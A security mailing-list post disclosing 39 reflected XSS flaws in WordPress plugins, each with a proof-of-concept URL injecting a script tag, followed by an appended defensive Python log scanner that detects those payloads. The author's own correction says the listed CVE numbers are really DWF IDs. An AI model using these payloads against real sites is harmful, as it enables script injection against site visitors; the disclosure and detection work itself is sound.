Date: Wed, 13 Apr 2016 08:34:05 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: oss-security@...ts.openwall.com
Subject: Re: 39 XSS vulnerabilities in 35 wordpress plugins.

Hello List,

This was meant to be s/CVE/DWF/g; thanks Henri for catching that.

-- Larry


> On Apr 12, 2016, at 8:48 AM, Larry W. Cashdollar <larry0@...com> wrote:
> 
> Hello List,
> 
> 
> This was a project I worked on as part of my research in Akamai's SIRT. I initially found 1352 suspect XSS vulnerabilities, but WordPress escapes the super globals GET/POST/REQUEST
> (https://core.trac.wordpress.org/ticket/18322). I didn't know this at the time, so now I have a database of vulnerabilities that are context dependent and would need to be examined
> individually. I managed to automate XSS testing against the database, and of the 1352, 39 successfully executed JavaScript. These are those 39; I've manually verified they're still vulnerable.
> 
> They're available here http://www.vapidlabs.com/wp/wp.php
> 
> I notified WordPress back in February of my research.
> 
> 
> Plugin:https://wordpress.org/plugins/mousewheel-smooth-scroll File:./mousewheel-smooth-scroll/js/wpmss.php Parameter:ease  speed step CVE-2016-77447 PoC:hxxp://[target]/wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php?step="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/indexisto File:./indexisto/assets/js/indexisto-inject.php Parameter:indexisto_index CVE-2016-77360 PoC:hxxp://[target]/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/prettypre File:./prettypre/prettyprecss.php Parameter:ts CVE-2016-77548 PoC:hxxp://[target]/wp-content/plugins/prettypre/prettyprecss.php?ts="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/whizz File:./whizz/plugins/delete-plugin.php Parameter:plugin CVE-2016-77799 PoC:hxxp://[target]/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/mypuzzle-jigsaw File:./mypuzzle-jigsaw/getGallery.php Parameter:callback CVE-2016-77465 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-jigsaw/getGallery.php?callback="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/anti-plagiarism File:./anti-plagiarism/js.php Parameter:m CVE-2016-77035 PoC:hxxp://[target]/wp-content/plugins/anti-plagiarism/js.php?m="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/qoate-scroll-triggered-box File:./qoate-scroll-triggered-box/assets/js/script.php Parameter:anim perc sac vpos CVE-2016-77559 PoC:hxxp://[target]/wp-content/plugins/qoate-scroll-triggered-box/assets/js/script.php?anim="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/s3-video File:./s3-video/views/video-management/preview_video.php Parameter:media CVE-2016-77600 PoC:hxxp://[target]/wp-content/plugins/s3-video/views/video-management/preview_video.php?media="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/wpsolr-search-engine File:./wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php Parameter:page  tab CVE-2016-77958 PoC:hxxp://[target]/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/page-layout-builder File:./page-layout-builder/includes/layout-settings.php Parameter:layout_settings_id CVE-2016-77503 PoC:hxxp://[target]/wp-content/plugins/page-layout-builder/includes/layout-settings.php?layout_settings_id="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/mypuzzle-sliding File:./mypuzzle-sliding/getGallery.php Parameter:callback CVE-2016-77466 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-sliding/getGallery.php?callback="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/date_select.php Parameter:date-from date-to CVE-2016-77217 PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/date_select.php?date-from="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/e-search File:./e-search/tmpl/title_az.php Parameter:title_az CVE-2016-77217 PoC:hxxp://[target]/wp-content/plugins/e-search/tmpl/title_az.php?title_az="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/tidio-gallery File:./tidio-gallery/popup-insert-help.php Parameter:galleryId id  tidio-gallery CVE-2016-77727 PoC:hxxp://[target]/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/parsi-font File:./parsi-font/css.php Parameter:font size CVE-2016-77506 PoC:hxxp://[target]/wp-content/plugins/parsi-font/css.php?size="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/defa-online-image-protector File:./defa-online-image-protector/redirect.php Parameter:r CVE-2016-77193 PoC:hxxp://[target]/wp-content/plugins/defa-online-image-protector/redirect.php?r="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/new-year-firework File:./new-year-firework/firework/index.php Parameter:music text url CVE-2016-77475 PoC:hxxp://[target]/wp-content/plugins/new-year-firework/firework/index.php?text="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/simpel-reserveren File:./simpel-reserveren/edit.php Parameter:page CVE-2016-77628 PoC:hxxp://[target]/wp-content/plugins/simpel-reserveren/edit.php?page="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/groupon-widget File:./groupon-widget/widget.css.php Parameter:grpn_wdgt_get_it_btn_background grpn_wdgt_link_color grpn_wdgt_price_tag_background grpn_wdgt_shell_background grpn_wdgt_text_color grpn_wdgt_title_color CVE-2016-77332 PoC:hxxp://[target]/wp-content/plugins/groupon-widget/widget.css.php?grpn_wdgt_shell_background="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/wp-notifications File:./wp-notifications/css/ln_livenotifications_css.php Parameter:banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77885 PoC:hxxp://[target]/wp-content/plugins/wp-notifications/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/wp-latest-posts File:./wp-latest-posts/js/wpcufpn_front.js.php Parameter:id CVE-2016-77873 PoC:hxxp://[target]/wp-content/plugins/wp-latest-posts/js/wpcufpn_front.js.php?id="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/ajax-random-post File:./ajax-random-post/js.php Parameter:count interval CVE-2016-77022 PoC:hxxp://[target]/wp-content/plugins/ajax-random-post/js.php?interval="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/admin-font-editor File:./admin-font-editor/css.php Parameter:font size CVE-2016-77009 PoC:hxxp://[target]/wp-content/plugins/admin-font-editor/css.php?size="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/playlist.php Parameter:playlist CVE-2016-77337 PoC:hxxp://[target]/wp-content/plugins/hdw-tube/playlist.php?playlist="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/hdw-tube File:./hdw-tube/mychannel.php Parameter:channel CVE-2016-77337 PoC:hxxp://[target]/wp-content/plugins/hdw-tube/mychannel.php?channel="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/lbak-google-checkout File:./lbak-google-checkout/css/googlecheckout.php Parameter:ih iw ph pw tc CVE-2016-77395 PoC:hxxp://[target]/wp-content/plugins/lbak-google-checkout/css/googlecheckout.php?pw="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/razuna-media-manager File:./razuna-media-manager/pages/ajax/razuna-upload-callback.php Parameter:message responsecode CVE-2016-77577 PoC:hxxp://[target]/wp-content/plugins/razuna-media-manager/pages/ajax/razuna-upload-callback.php?responsecode="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/mypuzzle-find-the-pair-a-memory-game File:./mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php Parameter:callback CVE-2016-77464 PoC:hxxp://[target]/wp-content/plugins/mypuzzle-find-the-pair-a-memory-game/ftpair-getCardImages.php?callback="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/surveymonkey-button File:./surveymonkey-button/start_survey.php Parameter:jqueryPepPath CVE-2016-77702 PoC:hxxp://[target]/wp-content/plugins/surveymonkey-button/start_survey.php?jqueryPepPath="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/hero-maps-pro File:./hero-maps-pro/views/dashboard/index.php Parameter:p v CVE-2016-77341 PoC:hxxp://[target]/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/bbpress-social-network File:./bbpress-social-network/css/ln_livenotifications_css.php Parameter:banner_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77074 PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_css.php?dropdown_color="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/bbpress-social-network File:./bbpress-social-network/css/ln_livenotifications_cssback.php Parameter:banner_bgcolor dropdown_bgcolor dropdown_bit_bgcolor dropdown_bit_color dropdown_boder_color dropdown_color dropdown_hover_bgcolor dropdown_link_color CVE-2016-77074 PoC:hxxp://[target]/wp-content/plugins/bbpress-social-network/css/ln_livenotifications_cssback.php?dropdown_bgcolor="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/edit_styles.php Parameter:gid CVE-2016-77517 PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/edit_styles.php?gid="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/photoxhibit File:./photoxhibit/common/inc/pages/build.php Parameter:gid CVE-2016-77517 PoC:hxxp://[target]/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/pondol-formmail File:./pondol-formmail/pages/admin-mail-info.php Parameter:itemid CVE-2016-77532 PoC:hxxp://[target]/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/heat-trackr File:./heat-trackr/heat-trackr_abtest_add.php Parameter:id N  WPSLT CVE-2016-77339 PoC:hxxp://[target]/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/tidio-form File:./tidio-form/popup-insert-help.php Parameter:formId id  tidio-form CVE-2016-77726 PoC:hxxp://[target]/wp-content/plugins/tidio-form/popup-insert-help.php?formId="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/simplified-content File:./simplified-content/ooawpframework/js/ajax/OOAAjax.js.php Parameter:ajaxURL CVE-2016-77642 PoC:hxxp://[target]/wp-content/plugins/simplified-content/ooawpframework/js/ajax/OOAAjax.js.php?ajaxURL="><script>alert(1);</script><"
> Plugin:https://wordpress.org/plugins/infusionsoft File:./infusionsoft/Infusionsoft/examples/leadscoring.php Parameter:ContactId CVE-2016-77364 PoC:hxxp://[target]/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId="><script>alert(1);</script><"
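For the defender's side, here is an added example (not part of Larry's post or of any of the listed plugins) that scans web-server access-log lines for requests against the files the advisory names and flags parameters carrying the attribute-break-out and script payload the PoCs use. The endpoint table is a subset copied from the post, the log lines are constructed, and the check also catches double-URL-encoded variants, which the post's PoCs do not show.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoints and parameters copied from the advisory (a subset; same plugin paths as the post).
ADVISORY_ENDPOINTS = {
    "/wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php": {"ease", "speed", "step"},
    "/wp-content/plugins/prettypre/prettyprecss.php": {"ts"},
    "/wp-content/plugins/parsi-font/css.php": {"font", "size"},
    "/wp-content/plugins/hdw-tube/playlist.php": {"playlist"},
}

# Combined log format: client, ident, user, [timestamp], "METHOD target proto", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Attribute break-out and script injection as in the advisory's PoCs, plus the usual variants.
XSS_MARKERS = re.compile(r'<\s*script|"\s*>|javascript:|\bon\w+\s*=', re.IGNORECASE)

# Constructed sample lines: a PoC-style hit, a benign request, a double-encoded hit, an out-of-scope request.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Apr/2016:10:01:22 +0000] "GET /wp-content/plugins/mousewheel-smooth-scroll/js/wpmss.php?step=%22%3E%3Cscript%3Ealert(1)%3B%3C/script%3E%3C%22 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Apr/2016:10:01:23 +0000] "GET /wp-content/plugins/parsi-font/css.php?font=tahoma&size=12 HTTP/1.1" 200 233 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Apr/2016:10:02:01 +0000] "GET /wp-content/plugins/hdw-tube/playlist.php?playlist=%2522%253E%253Cscript%253Ealert%25281%2529%253C%252Fscript%253E HTTP/1.1" 200 300 "-" "curl/7.47.0"',
    '198.51.100.7 - - [13/Apr/2016:10:02:02 +0000] "GET /index.php?s=%3Cscript%3E HTTP/1.1" 200 4000 "-" "curl/7.47.0"',
]


def inspect_line(line):
    """Parse one access-log line; return a finding dict for advisory endpoints, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    watched = ADVISORY_ENDPOINTS.get(url.path)
    if watched is None:
        return None  # not one of the files the advisory lists
    hits = []
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        # parse_qsl decodes once; decode again so %2522-style double encoding does not evade the check
        decoded = unquote(value)
        if name in watched and XSS_MARKERS.search(decoded):
            hits.append((name, decoded))
    return {"ip": m.group("ip"), "path": url.path, "status": int(m.group("status")), "hits": hits}


def scan_log(lines):
    """Return one finding per request carrying an XSS marker in a parameter the advisory names."""
    return [f for f in map(inspect_line, lines) if f and f["hits"]]
```

A 200 status on a flagged request is the case worth triaging first, since these endpoints reflect the parameter rather than reject it.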
